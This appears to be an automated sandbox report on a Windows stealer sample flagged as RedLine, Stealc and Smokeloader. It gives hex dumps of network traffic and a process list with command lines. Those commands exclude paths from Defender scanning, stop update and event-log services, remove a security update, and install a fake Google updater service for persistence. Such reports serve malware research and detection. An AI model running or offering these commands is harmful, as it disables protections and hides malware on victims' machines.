                                                                                              2024-10-30 18:47:11 UTC16384INData Raw: d3 f6 35 c3 c9 06 fc 61 ca f8 64 72 67 28 0e c5 92 18 01 a0 7b ad ff 44 1b e7 04 a1 31 d8 01 f9 65 fb 05 cd 55 fa 33 e5 69 dd 34 c7 92 b9 d1 e9 89 ee c9 9d 80 29 2d 07 5e 2f 6d a0 45 1a e9 41 89 cd d4 ce c1 b0 f5 a0 91 39 38 e9 1b fd d9 05 73 85 02 06 d8 14 29 ed 23 6e 33 a3 f9 e1 c9 01 cb 24 ff 05 89 7a dd c1 91 d3 e1 8b c5 f8 e6 81 6d 0a 41 90 d9 1f e0 14 1b cd 2b bc 08 5b 75 a9 7a 9b 3d ae 03 39 32 d5 70 fe f5 19 1b 98 f6 74 bf ec 3b 37 86 39 9d 8a 78 f3 9f 41 70 31 f6 42 20 ea 33 2e 0a b9 92 79 1b 17 61 41 d9 a3 eb 99 21 3c 1f ef 8d 24 f5 01 95 f1 bf 6f 03 f0 10 0a 03 79 2a c3 6a 79 6c a0 8f 09 02 bd 51 f1 c9 fa 63 da c6 0b cf 1f a6 7c af 38 cf f7 73 e0 51 fb 5d b9 75 92 5f df da a4 a1 0c f6 a3 bf 10 26 0a 93 cf 86 e1 fc f1 ff 14 ae 50 c3 93 c4 ef fb
                                                                                              Data Ascii: 5adrg({D1eU3i4)-^/mEA98s)#n3$zmA+[uz=92pt;79xAp1B 3.yaA!<$oy*jylQc|8sQ]u_&P
                                                                                              2024-10-30 18:47:11 UTC16384INData Raw: dd fa 0f d8 7e ea 1a 65 82 16 e0 91 6f 58 1a 13 bb 8e 75 bf c4 e6 e1 94 22 02 75 a2 d7 3b 75 a6 39 23 75 97 da 78 75 d0 65 df c6 90 7d f5 94 44 6c 7a bf c1 8a 39 c3 bd 01 75 75 d7 1b 39 c9 fa 97 5c 55 f4 af 5c 33 d6 1c d2 f6 be ce f3 e0 5a 1a 64 f5 63 7d 39 c8 5c c0 dc 19 95 1e 3d f5 9f e4 0a 06 61 8d 01 cb a1 85 cd d1 f2 95 65 13 f5 60 9a f6 c4 7f bc 05 a1 9b dd b0 c1 db e3 ce 00 69 e4 d9 ec c1 da 3d c5 79 09 a2 d1 9f 10 9d c2 62 eb e1 42 d7 e4 e4 41 67 00 24 06 8f a5 03 a2 70 ef e1 c2 9c f5 13 ac 56 bc 58 b7 ef 98 8f a4 fa 74 c7 93 93 ef 92 be 66 16 de 60 9b e8 3c ab 7f fd 10 c5 d9 b3 52 e1 a3 df 24 ae 54 27 40 45 8a b8 4f 62 bf 9a f5 84 52 e3 2f ad b9 4a d1 e3 7f 71 75 04 76 21 a0 49 bd f8 9c 41 fa b5 14 ba 1b e7 dc f2 d1 63 d8 68 1b 2c 2e a5 0c 10 72
                                                                                              Data Ascii: ~eoXu"u;u9#uxue}Dlz9uu9\U\3Zdc}9\=ae`i=ybBAg$pVXtf`<R$T'@EObR/Jquv!IAch,.r
                                                                                              2024-10-30 18:47:11 UTC16384INData Raw: 7d f1 d2 4b 9b 35 f6 ef 5f e2 ae c1 77 01 32 14 97 0c 11 98 f3 b8 17 25 9b eb 76 ce 43 bc f9 be 17 93 a8 5b 9b fe f5 e2 6e 14 f5 06 db cd 03 a7 67 05 e0 84 7b e2 36 f0 75 d5 a4 da b8 d1 0a 8d 2b bc d0 b5 bb 22 d3 6c 72 f5 18 a6 e3 e6 76 02 6e 13 06 c0 a0 32 f5 04 d5 f0 d3 d2 89 f0 fd 8e da e3 de 44 9b e8 cf c2 96 9c 65 c9 6a f4 00 91 f7 e4 6d a4 6d 3d a7 98 63 ed f5 ab 78 0c cd c8 72 0f 09 f5 cb e1 29 98 da d7 ab 08 39 63 05 41 7a 2c bc 46 2e 5e cf a4 86 3e a6 71 69 02 d3 b4 67 be f2 f9 7b 94 18 0b 8d 2a c8 cf 87 f0 91 14 1b 92 fe c4 bd 39 41 45 d8 d9 67 9a 9b dd 76 8e 62 07 3d 71 6d d9 65 9f b8 24 23 fa 95 cc fc c1 78 30 c6 44 6c d1 d4 6f 9b e1 d7 e3 b2 f0 30 9c 15 1f cd 65 f7 38 cf ba 15 39 ff a0 cd 6a f5 f4 3a d0 f4 f5 7f f7 ed c1 4c 08 68 3c 1b 16 99
                                                                                              Data Ascii: }K5_w2%vC[ng{6u+"lrvn2Dejmm=cxr)9cAz,F.^>qig{*9AEgvb=qme$#x0Dlo0e89j:Lh<
                                                                                              2024-10-30 18:47:12 UTC16384INData Raw: 9c 0d 85 05 69 2a 9d 41 8e f8 cb d4 47 3c dd 7e 5a b2 75 1e 15 39 0f c3 9c dc 0d 8e ab b3 d1 8f 5e 17 fb 41 9b e4 dd a2 9b ea 24 ec 86 46 3b af 9b 24 fa 1e 1b 13 ed 41 85 28 ca b1 9b 09 49 08 1d cf cf a5 6a 22 d3 53 f7 2e 27 45 d1 e2 6f 08 c4 f9 f6 fc c5 f5 e2 02 a8 4b f5 b7 8e f2 12 c5 16 25 fd 9f 7c 62 f5 ed b9 f4 05 06 60 01 5a ea 65 fd d9 05 85 0e 02 05 4f 2c cb a2 9c dc 9c f1 d3 f8 14 c2 77 f7 d4 e8 64 f3 90 d1 7a 6f 55 90 c1 bb 15 00 75 ee 39 1d b3 ae cc cb 7f 00 fe 45 cf dc 46 f1 55 5c 14 83 02 49 75 9a d6 f3 cd a6 a2 3c f5 9d 9c 27 71 03 79 e6 13 8f f0 a8 f5 97 c7 d4 e2 8d 8a 86 10 90 c6 86 dd c4 da e3 09 ec 8d f7 99 a7 9b fb f4 e3 bd 38 f0 07 e4 38 d5 9b 36 4c f5 e5 30 fa bd c1 31 1c d2 99 8e b1 c4 83 1d bc cf a7 93 d0 cb 73 17 39 e8 0f 9b f6 11
                                                                                              Data Ascii: i*AG<~Zu9^A$F;$A(Ij"S.'EoK%|b`ZeO,wdzoUu9EFU\Iu<'qy886L01s9


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:14:46:57
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Users\user\Desktop\b4s45TboUL.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\b4s45TboUL.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:712'192 bytes
                                                                                              MD5 hash:B6F6E51F0EFA952F3FFCAAB9DD5895DB
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2091006922.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:14:47:19
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\HIIDGCGCBF.exe"
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:3
                                                                                              Start time:14:47:19
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:4
                                                                                              Start time:14:47:19
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\ProgramData\HIIDGCGCBF.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\ProgramData\HIIDGCGCBF.exe"
                                                                                              Imagebase:0x7ff68cba0000
                                                                                              File size:8'662'936 bytes
                                                                                              MD5 hash:0F247FC98A73243773ED3614FFAD3118
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Antivirus matches:
                                                                                              • Detection: 47%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:7
                                                                                              Start time:14:47:20
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:8
                                                                                              Start time:14:47:20
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:9
                                                                                              Start time:14:47:22
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                              Imagebase:0x7ff6eef20000
                                                                                              File size:55'320 bytes
                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:10
                                                                                              Start time:14:47:22
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6556 -ip 6556
                                                                                              Imagebase:0x9a0000
                                                                                              File size:483'680 bytes
                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:11
                                                                                              Start time:14:47:22
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2568
                                                                                              Imagebase:0x9a0000
                                                                                              File size:483'680 bytes
                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:12
                                                                                              Start time:14:47:23
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                              Imagebase:0x7ff693ab0000
                                                                                              File size:496'640 bytes
                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:13
                                                                                              Start time:14:47:23
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                              Imagebase:0x7ff7fedf0000
                                                                                              File size:289'792 bytes
                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:14
                                                                                              Start time:14:47:23
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                              Imagebase:0x7ff6bfae0000
                                                                                              File size:72'192 bytes
                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:15
                                                                                              Start time:14:47:23
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:16
                                                                                              Start time:14:47:23
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:17
                                                                                              Start time:14:47:23
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\wusa.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                              Imagebase:0x7ff6ded10000
                                                                                              File size:345'088 bytes
                                                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:18
                                                                                              Start time:14:47:23
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                              Imagebase:0x7ff6bfae0000
                                                                                              File size:72'192 bytes
                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:19
                                                                                              Start time:14:47:23
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:20
                                                                                              Start time:14:47:23
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                                              Imagebase:0x7ff6bfae0000
                                                                                              File size:72'192 bytes
                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:21
                                                                                              Start time:14:47:23
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:22
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\sc.exe stop bits
                                                                                              Imagebase:0x7ff6bfae0000
                                                                                              File size:72'192 bytes
                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:23
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:24
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                                              Imagebase:0x7ff6bfae0000
                                                                                              File size:72'192 bytes
                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:25
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:26
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                              Imagebase:0x7ff79f0f0000
                                                                                              File size:96'256 bytes
                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:27
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                              Imagebase:0x7ff79f0f0000
                                                                                              File size:96'256 bytes
                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:28
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:29
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                              Imagebase:0x7ff79f0f0000
                                                                                              File size:96'256 bytes
                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:30
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:31
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                              Imagebase:0x7ff79f0f0000
                                                                                              File size:96'256 bytes
                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:32
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:33
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:34
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                                              Imagebase:0x7ff6bfae0000
                                                                                              File size:72'192 bytes
                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:35
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:36
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                                                              Imagebase:0x7ff6bfae0000
                                                                                              File size:72'192 bytes
                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:37
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:38
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                                              Imagebase:0x7ff6bfae0000
                                                                                              File size:72'192 bytes
                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:39
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                                                              Imagebase:0x7ff6bfae0000
                                                                                              File size:72'192 bytes
                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:40
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:41
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:42
                                                                                              Start time:14:47:24
                                                                                              Start date:30/10/2024
                                                                                              Path:C:\ProgramData\Google\Chrome\updater.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                                                                              Imagebase:0x7ff757d10000
                                                                                              File size:8'662'936 bytes
                                                                                              MD5 hash:0F247FC98A73243773ED3614FFAD3118
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Antivirus matches:
